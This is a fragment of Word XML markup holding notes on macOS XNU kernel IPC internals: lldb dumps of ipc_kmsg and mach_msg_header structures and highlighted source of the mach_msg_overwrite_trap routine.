    <w:p w:rsidR="001800E2" w:rsidRPr="0024660C" w:rsidRDefault="001800E2" w:rsidP="00CA005E">
      <w:pPr>
        <w:ind w:firstLine="210"/>
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Bold" w:hAnsi="Menlo-Bold" w:cs="Menlo-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00266C65" w:rsidRPr="00266C65" w:rsidRDefault="00266C65" w:rsidP="00266C65">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="145" w:name="_Toc445313347"/>
      <w:r w:rsidRPr="00266C65">
        <w:t>ipc_kmsg_t</w:t>
      </w:r>
      <w:bookmarkEnd w:id="145"/>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lldb) expr -A -T -L -- *(ipc_kmsg_t) 0xffffff801c5d45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80: (ipc_kmsg) $2 = {</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80:   (mach_msg_size_t) ikm_size = 184</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88:   (ipc_kmsg *) ikm_next = 0xffffff801c5d45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90:   (ipc_kmsg *) ikm_prev = 0xffffff801c5d45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98:   (mach_msg_header_t *) ikm_header = 0xffffff801c5d456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a0:   (ipc_port_t) ikm_prealloc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a8:   (ipc_port_t) ikm_voucher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b0:   (ipc_importance_elem *) ikm_importance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b8:   (queue_chain_t) ikm_inheritance = {</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b8:     (queue_entry *) next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a6ac0:     (queue_entry *) prev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 xml:space="preserve">  }</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lldb) expr -A -T -L -- *(mach_msg_header_t *)  0xffffff801c5d456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a0: (mach_msg_header_t) $3 = {</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a0:   (mach_msg_bits_t) msgh_bits = 2147488273</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a4:   (mach_msg_size_t) msgh_size = 92</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a8:   (mach_port_t) msgh_remote_port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b0:   (mach_port_t) msgh_local_port = 0x0000000000000000</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b8:   (mach_port_name_t) msgh_voucher_port = 2649275825</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0x00007f9d5c899fbc:   (mach_msg_id_t) msgh_id = 2862</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00266C65" w:rsidRPr="00266C65"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t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00266C65" w:rsidRPr="00CA005E" w:rsidRDefault="00266C65" w:rsidP="00266C65">
      <w:pPr>
        <w:ind w:firstLine="210"/>
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Bold" w:hAnsi="Menlo-Bold" w:cs="Menlo-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00266C65">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Bold" w:hAnsi="Menlo-Bold" w:cs="Menlo-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>(lldb)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FB25CA" w:rsidRDefault="00B1522D" w:rsidP="005E36D3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="146" w:name="_Toc445313348"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(user)</w:t>
      </w:r>
      <w:r w:rsidR="00FB25CA">
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidR="00FB25CA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ach_msg_overwrite</w:t>
      </w:r>
      <w:bookmarkEnd w:id="146"/>
    </w:p>
    <w:p w:rsidR="00C5329C" w:rsidRPr="00C5329C" w:rsidRDefault="00C5329C" w:rsidP="00C5329C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/*</w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t> *  Routine:    mach_msg_overwrite_trap [mach trap]</w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t> *  Purpose:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t> *      Possibly send a message; possibly receive a message.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t> *  Conditions:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t> *      Nothing locked.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t> *  Returns:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t> *      All of mach_msg_send and mach_msg_receive error codes.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t> */</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r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>mach_msg_return_t</w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>mach_msg_overwrite_trap</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struct</w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>mach_msg_overwrite_trap_args</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args</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vm_address_t</w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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msg</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msg_option_t</w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>   </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option</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msg_size_t</w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>     </w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>send_siz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send_siz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msg_size_t</w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>     </w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>rcv_siz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rcv_siz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port_name_t</w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>    </w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>rcv_nam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rcv_nam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msg_timeout_t</w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>msg_timeou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timeout</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__unused</w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>mach_port_name_t</w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>notify</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notify</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vm_address_t</w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>rcv_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args</w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>rcv_msg</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ach_msg_size_t</w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>     </w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>scatter_list_siz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color w:val="008080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0</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i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/* NOT INITIALIZED - but not used in pactice */</w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    </w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>__unused</w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>mach_port_seqno_t</w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>temp_seqno</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color w:val="008080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0</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sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>mach_msg_return_t</w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rP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vm_map_t</w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>map</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current_map</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i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/* Only accept options allowed by the user */</w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    </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color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MACH_MSG_OPTION_USER</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color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MACH_SEND_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space_t</w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>spac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current_spac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kmsg_t</w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </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kmsg_get</w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>msg_addr</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send_siz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r</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lastRenderedPageBreak/>
        <w:b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kmsg_copyin</w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</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spac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p</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sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>option</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kmsg_free</w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</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r</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kmsg_send</w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</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option</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sg_timeout</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kmsg_copyout_pseudo</w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</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spac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p</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BODY_NULL</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b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>void</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kmsg_put</w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>msg_addr</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k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kmsg</w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ikm_header</w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>msgh_siz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r</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color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MACH_RCV_MSG</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thread_t</w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sel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current_thread</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space_t</w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>spac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current_spac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object_t</w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>object</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ipc_mqueue_t</w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>mqueue</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ipc_mqueue_copyin</w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00C5329C">
        <w:rPr>
